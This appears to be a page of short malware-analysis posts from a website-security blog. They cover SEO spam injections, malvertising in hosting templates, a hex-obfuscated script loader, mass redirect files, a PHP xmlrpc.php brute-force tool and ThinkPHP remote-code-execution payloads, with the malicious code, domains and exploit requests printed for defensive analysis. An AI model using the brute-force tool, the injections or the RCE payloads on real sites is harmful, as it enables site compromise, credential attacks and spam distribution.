Category: Website Security

Malware-Serving Spam to Search Engine Bots

We recently discovered this malware with a list of IP ranges belonging to search engines that are serving them SEO spam. It even takes a snapshot of the website it’s on and uses that as a template so the pages look like they are a part of the website.

You can see some of the IP addresses the malware is looking for:

Here are some of the types of content being injected into the template page:

The left-side.php file contains the template taken from the main site where the malware is on:

As you can see, the malware uses special strings found in the template to know which parts to insert the spam into. The last part is a base64 encoded URL that leads to this spam(Viagra) website: hxxp://getbrowserssl[dot]xyz/tds/index.php?pl=aldactone

hxxp://thewebsite[dot]com/right-side.php?qid=2395&qcall=aldactone+mtf

This type of malware has the potential to do some lasting damage to any website, as spam pages are indexed by search engines, which can take weeks or months to drop. Page ranking and keywords might take even longer to fix, if at all.

May 31, 2019 by Krasimir Konov

Hosting page templates causing your website ad campaign...

It's quite common that hosting providers have templates set for pages like 40x and 50x error pages but it's uncommon for those templates to have ads in them, or even worse, having malvertising that will blacklist your site.

On a recent case, we came across a scenario where Google AdWords was blocking a campaign of a website due to URLs from www[.]iyfipgun[.]com.

Upon closer inspection the URLs were coming from the template that the hosting provider had set for the 404 Not Found pages.This was the code:

<!DOCTYPE HTML>
<html>

    <head>
        <title>404 Error - Page Not Found</title>
        <style>
            #ad_frame{ height:800px; width:100%; }
            body{ margin:0; border: 0; padding: 0; }
        </style>
        <script src="//ajax.googleapis[.]com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
        <script type="text/javascript" language="JavaScript">
            var url = 'hxxp://www[.]iyfipgun[.]com/?dn='
                + document.domain + '&pid=9POL6F2H4';

            $(document).ready(function() {
                $('#ad_frame').attr('src', url);
            });
        </script>
    </head>
    <body>
        <iframe id="ad_frame" src="hxxp://www[.]iyfipgun[.]com/"
            frameborder="0" scrolling="no">

            <!-- browser does not support iframe's -->

        </iframe>
    </body>

 </html>

If you are experiencing a similar report from any external providers such as AdWords, the template pages are the best place to start your investigation.

If this is indeed proven the culprit, a quick fix is to just force your own handle for certain pages on the .htaccess file such as:

ErrorDocument 404 "not found"

This means that it will simply display “not found” instead of showing the template page.

May 22, 2019 by Cesar Anjos

Hex’ing the CSS Style Attribute for Black Hat...

Dealing with Black Hat SEO injections on our daily operation is always fun and challenging at the same time. One day, we may work with heavily obfuscated codes but on another, it can be just spam in plain-text waiting to be removed.

In the last few months, we’ve seen and reported on different techniques used by attackers— ranging from using DOM-based JavaScript obfuscation to just plain CSS style manipulation. All of these attacks share the same goal, which is to make their spamblocks invisible to human visitors but accessible to be indexed by search engine crawlers t.

On a recent case, we found yet another simple but very interesting Black Hat SEO injection on a compromised website. The following malware was added on the theme’s header.php of a WordPress site:

<?php
print '<div style="\64\69\73\70\6c\61\79:\6e\6f\6e\65">';
for ($i1 = 0; $i1 < 18; $i1++) {
  $link1 = mt_rand(100, 9999999);
  echo "<a href=\"http://compromisedwebsite.com/wp-news.php?t=" .$link1. "\">viagra" .$link1. "</a><br>\r\n";
  echo "<a href=\"http:// compromisedwebsite.com/wp-stories.php?t=" .$link1. "\">casino" .$link1. t;/a><br>\r\n";
  echo "<a href=\"http:// compromisedwebsite.com/wp-max.php?t=" .$link1. "\">drugs" .$link1. "</a><br>\r\n";
  $i1++;
} ; 
print '</div>';
?>

The PHP code will then generate an HTML code to the site header as below;

<div style="\64\69\73\70\6c\61\79:\6e\6f\6e\65">
<a href="http://compromisedwebsite.com/wp-news.php?t=3743996">viagra3743996</a><br>
<a href="http:// compromisedwebsite.com/wp-stories.php?t=3743996">casino3743996</a><br>
...
<a href="http:// compromisedwebsite.com/wp-stories.php?t=8106883">casino8106883</a><br>
<a href="http:// compromisedwebsite.com/wp-max.php?t=8106883">drugs8106883</a><br>
</div>

The code makes use of hex characters to obfuscate a CSS style attribute in order to hide the spam blocks. Converting those characters to ASCII text, we can see it is just a normal display:none, a style attribute used to hide elements within the div tag on the web browser.

$ echo "\64\69\73\70\6c\61\79" | xxd -r -p
display
$ echo "\6e\6f\6e\65" | xxd -r -p
none

As a site owner, it’s very important to have mechanisms to detect, prevent, and remediate issues in place before search engine crawlers can fetch the hacked version of our site. The sooner we act on the problem, the lesser the effects on our SEO and Search Engine Results Page (SERP) entries. Use our SiteCheck Scanner to regularly scan your site for unwanted spam, and let us know if want to get it cleaned.

May 16, 2019 by Ahmad Azizan

xmlrpc.php Brute Force Tool

We discovered a xmlrpc.php brute-force tool in a malicious PHP script that appears to have been uploaded months ago after a vulnerable GDPR plugin exploit:

$data = $_POST['data'];
$parameter = $_POST['parameter'];
$domains = preg_split('/\s*(\r\n|\n|\r)\s*/', trim($data), NULL, PREG_SPLIT_NO_EMPTY);
$param = trim($parameter);
$user_data = explode(":", $param);
$request_body =    "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>
<methodCall>
  <methodName>wp.getProfile</methodName>
  <params>
   <param><value>9999</value></param>
   <param><value>$user_data[0]</value></param>
   <param><value>$user_data[1]</value></param>
  </params>
 </methodCall>";
$urls[$request_count]["url"] = "http://" . $domain . "/xmlrpc.php";
$urls[$request_count]["request_body"] = $request_body;
$urls[$request_count]["param"] = $param;
$request_count++;
$multi_results = multi_thread_request($urls); // a multithreaded curl function that submits the bruteforce or dictionary attempt

We mentioned in a GDPR post that we were seeing default user_role values being changed along with user registration, but it looks like hackers were also wanting to perform bruteforce/dictionary amplification attacks targeting the WordPress file xmlrpc.php on their victims. They are able to perform these attacks from compromised websites after they upload a file with code similar to the above example, then they can submit the target URLs and a list of username/passwords through the defined $_POST parameters (e.g data and parameter). After the data has been submitted to the PHP file through the POST request, it is crafted into a multi-threaded curl request which will include the URL, username, and password values from the POST request in a new WordPress XML-RPC wp.getProfile request.

If any of the submitted logins are successful in the submitted XML-RPC request, then we will receive all of the WordPress user information regarding that specific user:

<member><name>user_id</name><value><string>2</string></value></member>
<member><name>username</name><value><string>wp.service.controller</string></value></member>

<member><name>first_name</name><value><string></string></value></member>
  <member><name>last_name</name><value><string></string></value></member>
 <member><name>registered</name><value><dateTime.iso8601>00000000T00:00:00Z</dateTime.iso8601></value></member>
 <member><name>bio</name><value><string></string></value></member>
 <member><name>email</name><value><string>test@example.com</string></value></member>

Otherwise, it will return a 403 Forbidden-style fault error if authenticating with an existing WordPress user on the targets installation was unsuccessful:

       <name>faultCode</name>
       <value><int>403</int></value>
     </member>
     <member>
       <name>faultString</name>
       <value><string>Incorrect username or password.</string></value>
May 9, 2019 by Luke Leal

Fake relatable domain used to distribute ads

Malicious users try to hide their malicious scripts in many ways these days, some more clever then others, in this case we look at a domain which looks like GoogleADS[.]com but it's actually GoogleADSL[.]com, this was done to make the domain look more legitimate and fool users into thinking the website is just loading Google ads. We found the domain to be used to redirect redirect users via fake jquery.js request.

The domain googleadsl.com appears to be registered by somebody in China and is being used to distribute the malicious ads.

Domain Name:googleadsl.com
Registry Domain ID:1650621483_domain_com-vrsn
Registrar WHOIS Server:whois.paycenter.com.cn
Registrar URL:hxxp://www.xinnet.com
Creation Date:2011-04-13T04:43:52.00Z

Here is the malicious code we found, you can see that it was hex encoded so that its hard to detect and analyze:

< Script language="javascript">
<!--
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x53\x43\x52\x49\x50\x54 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x61\x64\x73\x6c\x2e\x63\x6f\x6d\x2f\x73\x70\x63\x6f\x64\x65\x2f\x6a\x71\x75\x65\x72\x79\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
-->
</Script>

Decoded:

window["document"]["write"] ('<SCRIPT src="hxxp://www.googleadsl.com/spcode/jquery.js"></script>');

The above code redirects to 106hk.com:

curl --compressed -sD - -L -e "hxxp://randomsite.com" -A "Chrome 56" "hxxp://www.googleadsl.com/spcode/jquery.js"
HTTP/1.1 302 Redirect
Content-Length: 176
Content-Type: text/html
Location: hxxp://www.106hk.com/huodong/application/core/ajax.js

Here is the code returned after the redirect here:

hxxp://www.106hk.com/huodong/application/core/ajax.js

Content:

var cookieString = document.cookie;
var start = cookieString.indexOf("cookiesleep");
if(start!=-1){}else{
    var expires=new Date();
    expires.setTime(expires.getTime()+6*60*60*1000);
    document.cookie="cookiesleep=test;expires="+expires.toGMTString();
    var u = navigator.userAgent;
    if(u.indexOf('Android') > -1 || u.indexOf('Adr') > -1 ){
     window.location.href="hxxp://www.ncjkedu.com/3G/ads.html";
    }else{
     document.write('<script src="hxxp://libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>');
     document.write('<script src="hxxp://www.106hk.com/huodong/application/core/layer/layer.js"></script>');
     document.write('<script src="hxxp://www.106hk.com/huodong/application/core/ad.js"></script>');
    }
}

We found both of these to be porn ads:

hxxp://www.106hk.com/huodong/application/core/ad.js
hxxp://www.ncjkedu.com/3G/ads.html

Users should be vigilant and look for any content trying to load from suspicious domains, in this case almost all files were infected with the malicious code and we found the website making requests for googleadsl.com but this domain can change.

Apr 26, 2019 by Krasimir Konov

Thousands of Redirecting Files

We recently cleaned a site where we found thousands of malicious files with the following content:

<?php
header ( "HTTP/1.1 301 Moved Permanently" ) ;
header ( "Location: hxxp://realprofit[.]su/" ) ;
?>

and

<?php
header ( "HTTP/1.1 301 Moved Permanently" ) ;
header ( "Location: hxxp://profitnow[.]su/" ) ;
?>

All files were located in the site root directory and had names derived from a person's first names: mccarphy.php, viva.php, lotta.php, sang.php, trine.php, liviu.php, taylar.php, golden.php, staphane, stanislav.php, ismail.php, jerusha.php, menda.php, niel.php, samaira.php, kaa.php, franky.php etc.

Most likely these files are used in an email malware campaign. We found an analysis of one malicious .doc file that made requests to several domains, including realprofit[.]su, and then saved the response as an .exe file and executed it.

This particular wave of the attack is known to infect many sites. Profitnow[.]su was created on November 28, 2018, and according to RiskIQ, 700+ sites redirected there. Realprofit[.]su was created on December 6, 2018, and 500+ sites redirected there.

Some other domains used in this malware campaign:

out36.selfsend.ru
to5.topwenches[.]com
trybestsale[.]su
onlinehotprice[.]su
saleallshop[.]su
bestshopmaster[.]su
Apr 17, 2019 by Denis Sinegubko

ThinkPHP 5.x – Remote Code Execution Actively Exploited...

Earlier this year, we noticed an increase in attacks aiming at ThinkPHP. ThinkPHP is a PHP framework that is very popular in Asia. If you keep track of your site’s activity, the following log may look familiar:

POST: /index.php?s=captcha HTTP/1.1
Data: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig

In December 2018, a working exploit was released for the versions v5.0.23 and v5.1.31. Then, ThinkPHP team released a new version partially fixing the problem. Here is a snippet of the patch:

$method = strtoupper($_POST[Config::get('var_method')]); 
- $this->{$this->method}($_POST); 
+ if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) { 
+ $this->method = $method; 
+ $this->{$this->method}($_POST); 
+ }

Remote Code Execution on ThinkPHP

Basically, they filtered the parameter method to only accept legit values since later on the code function filterValue() passes the filter parameter directly to the PHP function call_user_func() leading to a remote code execution (RCE). Unfortunately, after reversing the patch, attackers also found that reaching the filterValue() function is still possible with an even simpler payload:

data: a=system&b=id&_method=filter  (some important data and more payloads were skipped here)

Affected Versions of ThinkPHP

Versions 5.1.x/ 5.2.x are still affected and since there's no strict validation of user input, bots were programmed to use a new variety of payloads to evade WAFs and previous fixes.

Attackers are exploiting this vulnerability to upload cryptominers. The following is the most recent domains hosting malicious binaries:

hxxp:// love[.]thotiana.live/bins/x86[.]bot
hxxp:// fid[.]hognoob[.]se/download[.]exe

Conclusion

As always, we recommend keeping your software up to date and use a WAF as a second layer of protection since sometimes developers fall short of solving security issues.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Apr 8, 2019 by John Castro